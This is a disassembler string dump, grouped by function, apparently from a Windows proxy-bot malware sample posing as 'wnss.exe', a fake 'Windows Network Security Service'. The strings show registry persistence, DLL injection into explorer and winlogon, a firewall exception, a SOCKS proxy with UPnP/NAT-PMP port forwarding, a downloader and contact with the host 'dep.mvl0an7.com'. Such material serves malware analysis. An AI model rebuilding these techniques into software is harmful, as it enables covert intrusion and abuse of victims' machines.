sub_4446FD(0194):
"{6EA9B038-C801-4F76-805F-E41ACF9ED165}"
|
sub_4023DC(0194):
"{6EA9B038-C801-4F76-805F-E41ACF9ED165}"
|
sub_443ECD(0368):
"PktRecv(): invalid signature (%i)\n"
"PktRecv(): packetId: 0x%03x\n"
"protorecv(): data size: %i (of %i)\n"
|
sub_401BAC(0368):
"PktRecv(): invalid signature (%i)\n"
"PktRecv(): packetId: 0x%03x\n"
"protorecv(): data size: %i (of %i)\n"
|
sub_404967(09d4):
"Software\\Microsoft\\Windows\\CurrentVersi"...
"InternalProgramData"
"listener...\n"
"SOCKS port: %i\n"
"NATPMP: forwarded to: %i\n"
"Software\\Microsoft\\Windows\\CurrentVersi"...
"InternalProgramData"
"starting COMM thread...\n"
|
sub_445EA7(09d4):
"authorized IP #%i [%s]\n"
|
sub_403B86(09d4):
"authorized IP #%i [%s]\n"
|
sub_44D631(241a):
"0123456789abcdef"
"0123456789ABCDEF"
|
sub_40B310(241a):
"0123456789abcdef"
"0123456789ABCDEF"
|
sub_404F15(2921):
"wnss"
"wnss"
|
sub_447236(2921):
"wnss"
"wnss"
|
sub_40A430(2a22):
" "
"00000000000000000000000000000000"
"00000000000000000000000000000000"
"00000000000000000000000000000000"
" "
|
sub_44C751(2a22):
" "
"00000000000000000000000000000000"
"00000000000000000000000000000000"
"00000000000000000000000000000000"
" "
|
sub_40569A(2c2a):
"Userinit"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
"Userinit"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
","
"Userinit"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
|
sub_4479BB(2c2a):
"Userinit"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
"Userinit"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
","
"Userinit"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
|
sub_447567(2c38):
"SYSTEM\\CurrentControlSet\\Services\\"
"wnss"
"Type"
"Start"
"ErrorControl"
"ErrorControl"
"LocalSystem"
"ObjectName"
"Windows Network Security Service"
"Windows Network Security Service"
"DisplayName"
"Provides network security options for s"...
"Provides network security options for s"...
"Description"
"C:\\WINDOWS\\system32\\wnss.exe"
"C:\\WINDOWS\\system32\\wnss.exe"
"ImagePath"
|
sub_405246(2c38):
"SYSTEM\\CurrentControlSet\\Services\\"
"wnss"
"Type"
"Start"
"ErrorControl"
"ErrorControl"
"LocalSystem"
"ObjectName"
"Windows Network Security Service"
"Windows Network Security Service"
"DisplayName"
"Provides network security options for s"...
"Provides network security options for s"...
"Description"
"C:\\WINDOWS\\system32\\wnss.exe"
"C:\\WINDOWS\\system32\\wnss.exe"
"ImagePath"
|
sub_40AF70(2c80):
"(null)"
|
sub_44D291(2c80):
"(null)"
|
sub_4067B0(2cc8):
"wnss"
"*update"
"ShutdownMutexCreate()=%i, h=%i\r\n"
"waiting 10 secs -- shutdown...\r\n"
"C:\\WINDOWS\\system32\\wnss.exe"
"copying...\n"
"C:\\WINDOWS\\system32\\wnss.exe"
"C:\\WINDOWS\\system32\\wnss.exe"
"C:\\WINDOWS\\system32\\wnss.exe"
"cmdline: <%s>\n"
"CreateProcess() failed %%-(\n"
"initializing winsock library...\n"
"removing: <%s>\n"
"C:\\WINDOWS\\system32\\wnss.exe"
"C:\\WINDOWS\\system32\\wnss.exe"
"**"
"*** waiting...\n"
"*** waiting complete...\n"
"no registered service, "
"C:\\WINDOWS\\system32\\wnss.exe"
"register it and restart\n"
"DON'T register it\n"
"registered service is here...\n"
"registered service is not running.\n"
"installing service, res="
"%i\n"
"starting service...\n"
"registered service is not running, unre"...
"C:\\WINDOWS\\system32\\wnss.exe"
"installing service...\n"
"service installed ok...\n"
"C:\\WINDOWS\\system32\\wnss.exe"
"**"
"starting service...\n"
"C:\\WINDOWS\\system32\\wnss.exe"
"**"
"initializing service startup sequence.."...
"not daemonized...\n"
|
sub_448AD1(2cc8):
"wnss"
"*update"
"ShutdownMutexCreate()=%i, h=%i\r\n"
"waiting 10 secs -- shutdown...\r\n"
"C:\\WINDOWS\\system32\\wnss.exe"
"copying...\n"
"C:\\WINDOWS\\system32\\wnss.exe"
"C:\\WINDOWS\\system32\\wnss.exe"
"C:\\WINDOWS\\system32\\wnss.exe"
"cmdline: <%s>\n"
"CreateProcess() failed %%-(\n"
"initializing winsock library...\n"
"removing: <%s>\n"
"C:\\WINDOWS\\system32\\wnss.exe"
"C:\\WINDOWS\\system32\\wnss.exe"
"**"
"*** waiting...\n"
"*** waiting complete...\n"
"no registered service, "
"C:\\WINDOWS\\system32\\wnss.exe"
"register it and restart\n"
"DON'T register it\n"
"registered service is here...\n"
"registered service is not running.\n"
"installing service, res="
"%i\n"
"starting service...\n"
"registered service is not running, unre"...
"C:\\WINDOWS\\system32\\wnss.exe"
"installing service...\n"
"service installed ok...\n"
"C:\\WINDOWS\\system32\\wnss.exe"
"**"
"starting service...\n"
"C:\\WINDOWS\\system32\\wnss.exe"
"**"
"initializing service startup sequence.."...
"not daemonized...\n"
|
sub_4058BE(2d1b):
":*:Enabled:"
"Windows Network Security Service"
"SYSTEM\\CurrentControlSet\\Services\\Share"...
|
sub_447BDF(2d1b):
":*:Enabled:"
"Windows Network Security Service"
"SYSTEM\\CurrentControlSet\\Services\\Share"...
|
sub_406544(3695):
"old DLL found; waiting for e"...
"iexplore.exe"
"explorer.exe"
"winlogon.exe"
"waiting for event...\n"
"dying\n"
"InjectionThread complete\n"
|
sub_405833(3821):
"*"
"writing to HKLM/autorun key...\n"
"Windows Network Security Service"
"Software\\Microsoft\\Windows\\CurrentVersi"...
"writing to HKCU/autorun key...\n"
"Windows Network Security Service"
"Software\\Microsoft\\Windows\\CurrentVersi"...
|
sub_447B54(3821):
"*"
"writing to HKLM/autorun key...\n"
"Windows Network Security Service"
"Software\\Microsoft\\Windows\\CurrentVersi"...
"writing to HKCU/autorun key...\n"
"Windows Network Security Service"
"Software\\Microsoft\\Windows\\CurrentVersi"...
|
sub_447098(3b59):
"wnss"
|
sub_404D77(3b59):
"wnss"
|
sub_445A44(3fd1):
"\""
"C:\\WINDOWS\\system32\\wnss.exe"
"\""
" "
|
sub_403723(3fd1):
"\""
"C:\\WINDOWS\\system32\\wnss.exe"
"\""
" "
|
sub_44744C(426b):
"wnss"
|
sub_40512B(426b):
"wnss"
|
sub_447153(4bc0):
"C:\\WINDOWS\\system32\\wnss.exe"
|
sub_404E32(4bc0):
"C:\\WINDOWS\\system32\\wnss.exe"
|
sub_40400E(4d2e):
"Srv: waiting %i seconds...\n"
"\r \r"
|
sub_4485C6(4d3a):
"process opened.\n"
"thread injected (%i).\n"
"thread complete (%i).\n"
"DLL injected!\n"
|
sub_4062A5(4d3a):
"process opened.\n"
"thread injected (%i).\n"
"thread complete (%i).\n"
"DLL injected!\n"
|
sub_40399A(51ed):
"UPDATE URL: <%s>\n"
"msss"
"msssx"
"*update \""
"\" \""
"\""
"running %s (%s)...\r\n"
|
sub_405D3F(5849):
"DLLTestThread: pulsing...\n"
|
sub_402896(5ca1):
" |
sub_444BB7(5ca1):
" |
sub_447925(5e2d):
"StartupPrograms"
"System\\CurrentControlSet\\Control\\Termin"...
"StartupPrograms"
"System\\CurrentControlSet\\Control\\Termin"...
"StartupPrograms"
"System\\CurrentControlSet\\Control\\Termin"...
|
sub_405604(5e2d):
"StartupPrograms"
"System\\CurrentControlSet\\Control\\Termin"...
"StartupPrograms"
"System\\CurrentControlSet\\Control\\Termin"...
"StartupPrograms"
"System\\CurrentControlSet\\Control\\Termin"...
|
sub_4088A0(6dab):
"hjltzL"
|
sub_44ABC1(6dab):
"hjltzL"
|
sub_405BE9(6e18):
"\""
"C:\\WINDOWS\\system32\\wnss.exe"
"\" "
|
sub_447F0A(6e18):
"\""
"C:\\WINDOWS\\system32\\wnss.exe"
"\" "
|
sub_405CA2(6fec):
"ServiceFixerThread started.\n"
"C:\\WINDOWS\\system32\\wnss.exe"
"**"
|
sub_444883(7590):
"."
|
sub_402562(7590):
"."
|
sub_4025A9(7718):
"http://"
"HTTP discovery request: [%s:%i]...\n"
"GET %s HTTP/1.1\r\nHOST: %s:%i\r\nACCEPT-LA"...
"HTTP discovery request [%s:%i]: receive"...
"\n"
"200"
|
sub_4448CA(7718):
"http://"
"HTTP discovery request: [%s:%i]...\n"
"GET %s HTTP/1.1\r\nHOST: %s:%i\r\nACCEPT-LA"...
"HTTP discovery request [%s:%i]: receive"...
"\n"
"200"
|
sub_4040C3(786d):
"SYSTEM"
|
sub_4463E4(786d):
"SYSTEM"
|
sub_402449(7bd4):
"{6EA9B038-C801-4F76-805F-E41ACF9ED165}"
|
sub_44476A(7bd4):
"{6EA9B038-C801-4F76-805F-E41ACF9ED165}"
|
sub_44360D(7dbe):
"WinSock 1.1 initialized.\n"
"WinSock 2.x initialized.\n"
|
sub_4012EC(7dbe):
"WinSock 1.1 initialized.\n"
"WinSock 2.x initialized.\n"
|
sub_44849C(8069):
"VirtualAllocEx() ok\n"
"kernel32.dll"
"LoadLibraryA"
"ExitThread"
"GetLastError"
"WriteProcessMemory() ok\n"
"<%s>\n"
|
sub_40617B(8069):
"VirtualAllocEx() ok\n"
"kernel32.dll"
"LoadLibraryA"
"ExitThread"
"GetLastError"
"WriteProcessMemory() ok\n"
"<%s>\n"
|
sub_447C50(80ab):
"{8FC4DDD4-C51E-11DC-98A8-E49F55D89593}"
"EVENT CREATON ERROR: %i\n"
"WAITING FOR STOP EVENT!\n"
|
sub_40592F(80ab):
"{8FC4DDD4-C51E-11DC-98A8-E49F55D89593}"
"EVENT CREATON ERROR: %i\n"
"WAITING FOR STOP EVENT!\n"
|
sub_40549E(85c6):
"RegRead(): opened %s\n"
"RegRead(): read %i bytes from %s (%s)\n"
"RegRead(): can't read key %s\n"
|
sub_4477BF(85c6):
"RegRead(): opened %s\n"
"RegRead(): read %i bytes from %s (%s)\n"
"RegRead(): can't read key %s\n"
|
sub_4470E2(8d8e):
"wnss"
|
sub_404DC1(8d8e):
"wnss"
|
sub_445643(8da5):
"router ip: [%s]\n"
"sending NAT-PMP fwd request #%i...\n"
"setsockopt NAT-PMP fwd request #%i...\n"
"receiving NAT-PMP fwd request #%i...\n"
"NAT-PMP fwd request #%i - ok\n"
"NAT-PMP request #%i - port: [%i]\n"
|
sub_403322(8da5):
"router ip: [%s]\n"
"sending NAT-PMP fwd request #%i...\n"
"setsockopt NAT-PMP fwd request #%i...\n"
"receiving NAT-PMP fwd request #%i...\n"
"NAT-PMP fwd request #%i - ok\n"
"NAT-PMP request #%i - port: [%i]\n"
|
sub_408B20(8eb3):
"CONOUT$"
|
sub_44AE41(8eb3):
"CONOUT$"
|
sub_4445B7(8f38):
":*:Enabled:"
"Windows Network Security Service"
"SYSTEM\\CurrentControlSet\\Services\\Share"...
|
sub_402296(8f38):
":*:Enabled:"
"Windows Network Security Service"
"SYSTEM\\CurrentControlSet\\Services\\Share"...
|
sub_403113(92ea):
"default gateway: [%s]\n"
"sending NAT-PMP request #%i...\n"
"setsockopt NAT-PMP request #%i...\n"
"receiving NAT-PMP request #%i...\n"
"NAT-PMP request #%i - ok\n"
"NAT-PMP request #%i - public IP: [%s]\n"
|
sub_445434(92ea):
"default gateway: [%s]\n"
"sending NAT-PMP request #%i...\n"
"setsockopt NAT-PMP request #%i...\n"
"receiving NAT-PMP request #%i...\n"
"NAT-PMP request #%i - ok\n"
"NAT-PMP request #%i - public IP: [%s]\n"
|
sub_4447C7(93c2):
"{6EA9B038-C801-4F76-805F-E41ACF9ED165}"
|
sub_4024A6(93c2):
"{6EA9B038-C801-4F76-805F-E41ACF9ED165}"
|
sub_4481D3(9711):
"#8001"
"resource here, size: %i\n"
"wb+"
"file <%s> NOT created\n"
"file <%s> created\n"
"file <%s> written, wsz=%i\n"
|
sub_405EB2(9711):
"#8001"
"resource here, size: %i\n"
"wb+"
"file <%s> NOT created\n"
"file <%s> created\n"
"file <%s> written, wsz=%i\n"
|
sub_447491(99ac):
"SYSTEM\\CurrentControlSet\\Services\\"
"wnss"
"ImagePath"
"C:\\WINDOWS\\system32\\wnss.exe"
|
sub_405170(99ac):
"SYSTEM\\CurrentControlSet\\Services\\"
"wnss"
"ImagePath"
"C:\\WINDOWS\\system32\\wnss.exe"
|
sub_4042CD(9aec):
"connection from [%s]\n"
"connection rejected (from [%s])\n"
"socks v%i [%s]\n"
"connecting to %s:%i\n"
"connection to %s:%i failed! %-( (%i)\n"
"transferring data...\n"
"data exchange complete\n"
"connection closed.\n"
|
sub_44868E(9b65):
"trying <%s> with <%s>\n"
"<%s>\n"
"trying <%s> with <%s> failed\n"
|
sub_40636D(9b65):
"trying <%s> with <%s>\n"
"<%s>\n"
"trying <%s> with <%s> failed\n"
|
sub_405772(9cf3):
"load"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
"load"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
"load"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
|
sub_447A93(9cf3):
"load"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
"load"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
"load"
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
|
sub_444E23(a465):
"239.255.255.250"
"239.255.255.250"
"shit!\n"
"xbind...\n"
"sending IUPnP discovery request #%i...\n"...
"M-SEARCH * HTTP/1.1\r\nHost: 239.255.255."...
"M-SEARCH * HTTP/1.1\r\nHost: 239.255.255."...
"setsockopt IUPnP discovery request #%i."...
"receiving IUPnP discovery request #%i.."...
"IUPnP discovery request #%i -- checking"...
"schemas-upnp-org:service:WANIPConnectio"...
"IUPnP discovery request #%i: bad (0)..."...
"location"
"IUPnP discovery request #%i: bad (1)..."...
"IUPnP discovery request #%i: bad (2)..."...
"location: <%s>\n"
"IUPnP discovery request #%i: bad (3)..."...
"urn:schemas-upnp-org:service:WANIPConne"...
""
""
""
"http://"
"IUPnP discovery request #%i: ok.\n"
|
sub_402B02(a465):
"239.255.255.250"
"239.255.255.250"
"shit!\n"
"xbind...\n"
"sending IUPnP discovery request #%i...\n"...
"M-SEARCH * HTTP/1.1\r\nHost: 239.255.255."...
"M-SEARCH * HTTP/1.1\r\nHost: 239.255.255."...
"setsockopt IUPnP discovery request #%i."...
"receiving IUPnP discovery request #%i.."...
"IUPnP discovery request #%i -- checking"...
"schemas-upnp-org:service:WANIPConnectio"...
"IUPnP discovery request #%i: bad (0)..."...
"location"
"IUPnP discovery request #%i: bad (1)..."...
"IUPnP discovery request #%i: bad (2)..."...
"location: <%s>\n"
"IUPnP discovery request #%i: bad (3)..."...
"urn:schemas-upnp-org:service:WANIPConne"...
""
""
""
"http://"
"IUPnP discovery request #%i: ok.\n"
|
sub_401ADA(ab88):
"PktSend(%i): %i bytes\n"
|
sub_443DFB(ab88):
"PktSend(%i): %i bytes\n"
|
sub_403C3F(c5c5):
"dep.mvl0an7.com"
"my port [%i]\n"
"SRV: [%s:%i]\n"
"SRV: connecting...\n"
"SRV: connecting failed.\n"
"SRV: handshaking...\n"
"SRV: rip? %i\n"
"SRV: handshaking failed.\n"
"SRV: ACK handshacking failed\n"
"* SRV: sending rejected IPs\n"
"SRV: ACK rejected IPs\n"
"SRV: ACK rejected IPs failed\n"
"SrvCommThread: done\n"
|
sub_403604(c61e):
"_win32__wnss_sdm__"
|
sub_44642F(c61e):
"_win32__wnss_um__"
|
sub_40410E(c61e):
"_win32__wnss_um__"
|
sub_445925(c61e):
"_win32__wnss_sdm__"
|
sub_40BD80(c81a):
"abort"
"arithmetic error"
"invalid executable code"
"interruption"
"invalid storage access"
"termination request"
"signal #"
" -- terminating\n"
|
sub_44E0A1(c81a):
"abort"
"arithmetic error"
"invalid executable code"
"interruption"
"invalid storage access"
"termination request"
"signal #"
" -- terminating\n"
|
sub_403658(caad):
"_win32__wnss_sdm__"
|
sub_4036F6(caad):
"_win32__wnss_sm__"
|
sub_445979(caad):
"_win32__wnss_sdm__"
|
sub_445A17(caad):
"_win32__wnss_sm__"
|
sub_4471E8(cb84):
"wnss"
|
sub_404EC7(cb84):
"wnss"
|
sub_448422(ccbf):
"SeDebugPrivilege"
|
sub_406101(ccbf):
"SeDebugPrivilege"
|
sub_4482DE(d442):
"r"
"old DLL: <%s>\n"
"wnss_"
"000.tmp"
"checking DLL: <%s>\n"
" DLL found: <%s>\n"
"wnss_"
"trying DLL: <%s>\n"
"DLL ok: <%s>\n"
"DLL not extracted.\n"
|
sub_405FBD(d442):
"r"
"old DLL: <%s>\n"
"wnss_"
"000.tmp"
"checking DLL: <%s>\n"
" DLL found: <%s>\n"
"wnss_"
"trying DLL: <%s>\n"
"DLL ok: <%s>\n"
"DLL not extracted.\n"
|
sub_403838(dc53):
"msdownloader"
"InternetOpenUrl(): %i\n"
"wb"
"fopen(%s)...\n"
"downloaded failed: [%s] --> %s\r\n"
"downloaded [%s] --> %s\r\n"
|
sub_445B59(dc53):
"msdownloader"
"InternetOpenUrl(): %i\n"
"wb"
"fopen(%s)...\n"
"downloaded failed: [%s] --> %s\r\n"
"downloaded [%s] --> %s\r\n"
|
sub_40B0C0(e625):
"0123456789ABCDEF"
"0123456789abcdef"
|
sub_44D3E1(e625):
"0123456789ABCDEF"
"0123456789abcdef"
|
sub_405DB5(ebc7):
"DLLTestListenThread: binding...\n"
"DLLTestListenThread: listening...\n"
"DLLTestListenThread: accepting...\n"
"DLLTestListenThread: done...\n"
|
sub_44730A(ef6f):
"C:\\WINDOWS\\system32\\wnss.exe"
"Windows Network Security Service"
"wnss"
"service registered\n"
"Provides network security options for s"...
|
sub_404FE9(ef6f):
"C:\\WINDOWS\\system32\\wnss.exe"
"Windows Network Security Service"
"wnss"
"service registered\n"
"Provides network security options for s"...
|